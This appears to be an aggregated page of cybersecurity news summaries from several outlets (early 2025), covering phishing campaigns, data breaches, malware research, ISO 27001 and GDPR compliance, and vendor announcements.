The Russian threat actor “Star Blizzard” has launched a spear-phishing campaign attempting to compromise WhatsApp accounts, according to researchers at Microsoft. The operation targets individuals who are involved in providing assistance to Ukraine.

Malvertising Campaign Abuses Google Ads to Target Advertisers

Researchers at Malwarebytes are tracking a major malvertising campaign that’s abusing Google Ads to target individuals and businesses interested in advertising.

CyberheistNews Vol 15 #03 Waging War on Explicit Deepfakes. The Real Problem Behind the UK Crackdown.

Threat Actors Abuse Google Translate to Craft Phishing Links

Threat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to Google, according to researchers at Abnormal Security.

Phishing Campaign Attempts to Bypass iOS Protections

An SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.

From Pig Butchering to People Talking

Interpol has recently recommended discontinuing the use of the term "Pig Butchering" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.

Effective Security Awareness Training Really Does Reduce Data Breaches

Social engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.

MY TAKE: Here’s why Donald Trump really needs to fully embrace Joe Biden’s cybersecurity EO

As one of his final official acts, President Joe Biden issued a landmark directive, addressing the evolving challenges posed by cyber threats while charting a strategic course toward a more secure digital ecosystem.

Related: How Trump views of AI, … (more…)

The post MY TAKE: Here’s why Donald Trump really needs to fully embrace Joe Biden’s cybersecurity EO first appeared on The Last Watchdog.

GUEST ESSAY: President Biden’s cybersecurity executive order is an issue of national security

President Biden’s detailed executive order relating to cybersecurity is great to see.

Biden’s order reflects the importance of cybersecurity at the highest levels – it is an issue of national security and should be treated as such.

One of the … (more…)

The post GUEST ESSAY: President Biden’s cybersecurity executive order is an issue of national security first appeared on The Last Watchdog.

News alert: Aembit announces speakers for NHIcon event, highlighting non-human identity security

Silver Spring, MD, Jan. 15, 2025, CyberNewswire — Aembit, the non-human identity and access management (IAM) company, unveiled the full agenda for NHIcon 2025, a virtual event dedicated to advancing non-human identity security, streaming live on Jan. 28 and … (more…)

The post News alert: Aembit announces speakers for NHIcon event, highlighting non-human identity security first appeared on The Last Watchdog.

News alert: Sweet Security’s LLM-powered detection engine reduces cloud noise to 0.04%

Tel Aviv, Israel, Jan. 15, 2025, CyberNewswire — Sweet Security, a leader in cloud runtime detection and response, today announced the launch of its groundbreaking patent-pending Large Language Model (LLM)-powered cloud detection engine.

This innovation enhances Sweet’s unified … (more…)

The post News alert: Sweet Security’s LLM-powered detection engine reduces cloud noise to 0.04% first appeared on The Last Watchdog.

News alert: Wultra secures €3M funding to help financial firms mitigate coming quantum threats

Prague, Czech Republic, Jan. 15, 2025, CyberNewswire — Quantum computing is set to revolutionize technology, but it also presents a significant security risk for financial institutions.

Czech cybersecurity startup Wultra has raised €3 million from Tensor Ventures, Elevator Ventures, and … (more…)

The post News alert: Wultra secures €3M funding to help financial firms mitigate coming quantum threats first appeared on The Last Watchdog.

News Alert: Security Risk Advisors joins Microsoft Intelligent Security Association (MISA)

Philadelphia, Pa., Jan. 7, 2025, CyberNewswire — Security Risk Advisors today announced it has become a member of the Microsoft Intelligent Security Association (MISA), an ecosystem of independent software vendors (ISVs) and managed security service providers (MSSPs) that have integrated … (more…)

The post News Alert: Security Risk Advisors joins Microsoft Intelligent Security Association (MISA) first appeared on The Last Watchdog.

News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes

Ramat Gan, Israel, January 7th, 2025, CyberNewswire — CyTwist, a leader in advanced next-generation threat detection solutions, has launched its patented detection engine to combat the insidious rise of AI-generated malware.

The cybersecurity landscape is evolving as attackers harness … (more…)

The post News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes first appeared on The Last Watchdog.

News alert: SquareX exposes OAuth attack on Chrome extensions — days before a major breach

Palo Alto, Calif., Dec. 30, 2024, CyberNewswire — SquareX, an industry-first Browser Detection and Response (BDR) solution, leads the way in browser security. About a week ago, SquareX reported large-scale attacks targeting Chrome Extension developers aimed at taking over … (more…)

The post News alert: SquareX exposes OAuth attack on Chrome extensions — days before a major breach first appeared on The Last Watchdog.

LW ROUNDTABLE:  Predictive analytics, full-stack visualization to solidify cyber defenses in 2025

To wrap up our 2024 year-end roundtable, we turn our attention to new technologies and trends that are emerging to help bridge the gaps.

Part four of our  four-part series

From cybersecurity skills shortages to the pressures of hybrid work, … (more…)

The post LW ROUNDTABLE:  Predictive analytics, full-stack visualization to solidify cyber defenses in 2025 first appeared on The Last Watchdog.

LW ROUNDTABLE: Compliance pressures intensify as new cybersecurity standards take hold

Today, part three of Last Watchdog’s year-end roundtable zeroes in on the regulatory and compliance landscape.

Part three of a four-part series

In 2024, global pressure on companies to implement advanced data protection measures intensified, with new standards in … (more…)

The post LW ROUNDTABLE: Compliance pressures intensify as new cybersecurity standards take hold first appeared on The Last Watchdog.

UnitedHealth almost doubles victim numbers from massive Change Healthcare data breach

UnitedHealth now estimates that 190 million people were affected by the massive Change Healthcare data breach nearly a year ago.

A week in security (January 20 – January 26)

Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!

Three privacy rules for 2025 (Lock and Code S06E02)

This week on the Lock and Code podcast, host David Ruiz shares three privacy rules for 2025, and they're all about taking back control.

Texas scrutinizes four more car manufacturers on privacy issues

The Texas Attorney General has requested information of four more car manufacturers about their data handling.

Warning: Don’t sell or buy a second hand iPhone with TikTok already installed

iPhones are being offered for sale with TikTok installed after the US ban caused the app to disappear from the app stores.

7-Zip bug could allow a bypass of a Windows security feature. Update now

A vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched.

AI tool GeoSpy analyzes images and identifies locations in seconds

Forget OSINT, AI-supported tool GeoSpy can determine a person's location based on their surroundings in a picture.

Your location or browsing habits could lead to price increases when buying online

Companies are showing customers different prices for the same goods and services based what data they have on them, including details like their precise location or browser history.

A week in security (January 13 – January 19)

Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!

WhatsApp spear phishing campaign uses QR codes to add device

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

Avery had credit card skimmer stuck on its site for months

Avery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.

PlugX malware deleted from thousands of systems by FBI

The FBI has announced it's deleted PlugX malware from approximately 4,258 US-based computers and networks.

The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads

An ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.

Insurance company accused of using secret software to illegally collect and sell location data on millions of Americans

An insurance company is accused of unlawfully collecting, using, and selling location data from millions of people's cell phones.

The new rules for AI and encrypted messaging, with Mallory Knodel (Lock and Code S06E01)

This week on the Lock and Code podcast, we speak with Mallory Knodel about whether AI assistants are compatible with encrypted messaging apps.

iMessage text gets recipient to disable phishing protection so they can be phished

Smishing messages that come with instructions to bypass iMessage's protection against links are on the rise

A week in security (January 6 – January 12)

A list of topics we covered in the week of January 6 to January 12 of 2025

BayMark Health Services sends breach notifications after ransomware attack

BayMark Health Services, Inc. notified an unknown number of patients that attackers stole their personal and health information.

Google Chrome AI extensions deliver info-stealing malware in broad attack

At least 36 Google Chrome extensions for AI and VPN tools have begun delivering info-stealing malware in a widespread attack.

Massive breach at location data seller: “Millions” of users affected

Data broker Gravy Analytics that collects location data and sells it to the US government has been breached.

What It Takes to Be Your Organisation’s DPO or Data Privacy Lead

‘GDPR’ has become a familiar term. We recognise the visible and consumer-facing aspects of the General Data Protection Regulation in our everyday lives – when consumers exercise their right to withdraw consent to their data being processed via ‘opt out’ or ‘unsubscribe’ buttons, for example. What’s less evident is whether organisations are keeping their practices fully up to date and in line with the GDPR and other applicable data protection laws. For instance: So, how sure are you that your organisation is fully compliant with the relevant data protection legislation? In this blog ‘Once compliant’ does not mean ‘still compliant’

The post What It Takes to Be Your Organisation’s DPO or Data Privacy Lead appeared first on IT Governance UK Blog.

Free Expert Insights: Index of Interviews

We regularly sit down with experts from within GRC International Group to get their insights on a technical topic or business area. Here are all our Q&As to date, grouped by broad topic: To get new expert insights straight to your inbox, sign up to our weekly newsletter, the Security Spotlight. Last updated: 15 January 2025. Interviews added: Andrew Pattison on DORA, how it compares to NIS 2, and how it’ll be regulated (DORA); Damian Garcia on transitioning to ISO 27001:2022 (ISO 27001); Louise Brooks on cookie audits (PECR); and Leon Teale on ethical hacking as a career (security testing). 

The post Free Expert Insights: Index of Interviews appeared first on IT Governance UK Blog.

How Can Organisations Transition to ISO 27001:2022?

Addressing the new Annex A control set Organisations with ISO/IEC 27001:2013 certification must transition to ISO/IEC 27001:2022 by 31 October 2025. The biggest change for organisations is Annex A, which has been overhauled and includes 11 new controls. How can organisations best approach this new control set? What changes to the main clauses of the Standard tend to get overlooked? And what are common mistakes to avoid when transitioning? Our head of GRC (governance, risk and compliance) consultancy, Damian Garcia, explains. In this interview Are the new controls in ISO 27001:2022 applicable? Where do organisations start when transitioning from ISO

The post How Can Organisations Transition to ISO 27001:2022? appeared first on IT Governance UK Blog.

The Benefits of Becoming an Ethical Hacker

Q&A with senior penetration tester Leon Teale Have you ever thought about getting paid to break into organisations’ networks? That’s precisely what ethical hackers (also known as ‘penetration testers’ or ‘pen testers’) do. But what exactly does this career involve? Why would you pursue it? And what knowledge and skills do you need to kick-start your career? We put these questions to our senior penetration tester Leon Teale, who’s been a qualified ethical hacker since 2012. In this interview Why pursue ethical hacking as a career What made you choose penetration testing as a career, and what do you enjoy

The post The Benefits of Becoming an Ethical Hacker appeared first on IT Governance UK Blog.

Step-by-Step Guide to Achieving GDPR Compliance

The data breaches that continue to make the headlines show the importance of data protection and laws like the GDPR (General Data Protection Regulation). If you’re only beginning to look at compliance, the Regulation may seem overwhelming. The good news is that many of the GDPR requirements reflect efficient business activities or practices – things that’ll help you as an organisation irrespective of compliance. This blog explains further, as we take you through eight steps towards becoming compliant with the GDPR and similar data protection laws. In this blog 1. Secure management buy-in Board or senior management support is a

The post Step-by-Step Guide to Achieving GDPR Compliance appeared first on IT Governance UK Blog.

How You Can Continually Improve Your ISO 27001 ISMS (Clause 10)

Your ISO 27001 journey doesn’t end once you’ve implemented your ISMS (information security management system) and controls. You must check your measures are doing what they’re supposed to do by: This reflects what you’re trying to address: information security risks. In this blog Your information security risks evolve over time All recent ISO management system standards, including ISO 27001:2022, require you to continually improve your management system. Risks evolve over time – particularly in a cyber security context. Cyber criminals are, unfortunately, innovative. They’re constantly coming up with new tools and exploits, meaning that organisations need to be pro-active about

The post How You Can Continually Improve Your ISO 27001 ISMS (Clause 10) appeared first on IT Governance UK Blog.

How ISO 27001 Helps You Comply With DORA

From 17 January 2025, DORA (Digital Operational Resilience Act) will, as an EU regulation, directly apply throughout the EU. Though the Regulation is primarily concerned with the operational resilience of critical and important functions of EU financial entities, UK organisations may also be in scope – particularly if they supply ICT services to EU financial institutions. As we conduct DORA gap analyses, we’ve noticed how the organisations with an ISO 27001 ISMS (information security management system) tend to have a higher degree of DORA compliance. In this blog How ISO 27001 helps with DORA compliance ISO 27001 provides the ‘building

The post How ISO 27001 Helps You Comply With DORA appeared first on IT Governance UK Blog.

Why You Need Cyber Resilience and Defence in Depth

And how to become resilient with ISO 27001 and ISO 22301 Unfortunately, even the most secure organisation can suffer an incident. The odds are simply stacked against you: While you need to protect all your assets from all types of threat, an attacker needs only one exploitable weakness to get into your systems. Plus, any security measure you implement is only designed to stop, at most, a handful of threats – and that’s assuming it was both correctly implemented and still doing its job. Regardless of implementation, single measures aren’t enough – because no measure is foolproof. The consequences of

The post Why You Need Cyber Resilience and Defence in Depth appeared first on IT Governance UK Blog.

How a GDPR Gap Analysis Helps Secure Support From Senior Management

GDPR gap analysis data shows compliance in the UK is “quite low” When implementing a GDPR (General Data Protection Regulation) compliance programme, a key challenge is securing the required resources and support – particularly from top management. Yet GDPR compliance brings business benefits beyond mitigating the risk of data breaches and fines: The value of a gap analysis But how can you get management to understand these benefits, and more to the point, understand how far away the organisation is from compliance? GDPR gap analysis offers a useful tool here – particularly if conducted by an independent third party. A

The post How a GDPR Gap Analysis Helps Secure Support From Senior Management appeared first on IT Governance UK Blog.

How to Select Effective Security Controls

Risk–benefit analysis, defence in depth, information security objectives and proportionality Looking to mitigate your information security risks but not sure how to choose effective controls while staying on budget? Risk–benefit analysis is key, as is defence in depth. You also want to set information security objectives that are aligned to your business objectives, and be proportionate in your control selections. Our head of GRC (governance, risk and compliance) consultancy, Damian Garcia, explains further. In this interview Risk–benefit analysis How do you choose appropriate security controls? You need to be clear on two things: Then hopefully, the benefit outweighs the risk.

The post How to Select Effective Security Controls appeared first on IT Governance UK Blog.

Mercedes-Benz Head Unit security research report

Kaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.

EAGERBEE, with updated and novel components, targets the Middle East

Kaspersky researchers analyze EAGERBEE backdoor modules, revealing a possible connection to the CoughingDown APT actor.

Threat landscape for industrial automation systems in Q3 2024

The ICS CERT quarterly report covers threat landscape for industrial automation systems in Q3 2024.

Cloud Atlas seen using a new tool in its attacks

We analyze the latest activity by the Cloud Atlas gang. The attacks employ the PowerShower, VBShower and VBCloud modules to download victims' data with various PowerShell scripts.

BellaCPP: Discovering a new BellaCiao variant written in C++

While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed "BellaCPP".

Attackers exploiting a patched FortiClient EMS vulnerability in the wild

Kaspersky's GERT experts describe an incident with initial access to enterprise infrastructures through a FortiClient EMS vulnerability that allowed SQL injections.

Lazarus group evolves its infection chain with old and new malware

Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.

Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

Kaspersky experts analyze attacks by C.A.S, a cybergang that uses uncommon remote access Trojans and posts data about victims in public Telegram channels.

Download a banker to track your parcel

The Mamont banking trojan is spreading under the guise of a parcel-tracking app for fake stores claiming to offer goods at wholesale prices.

Dark web threats and dark market predictions for 2025

Kaspersky experts review dark market trends in 2024, such as popularity of cryptors, loaders and crypto drainers on the dark web, and discuss what to expect in 2025.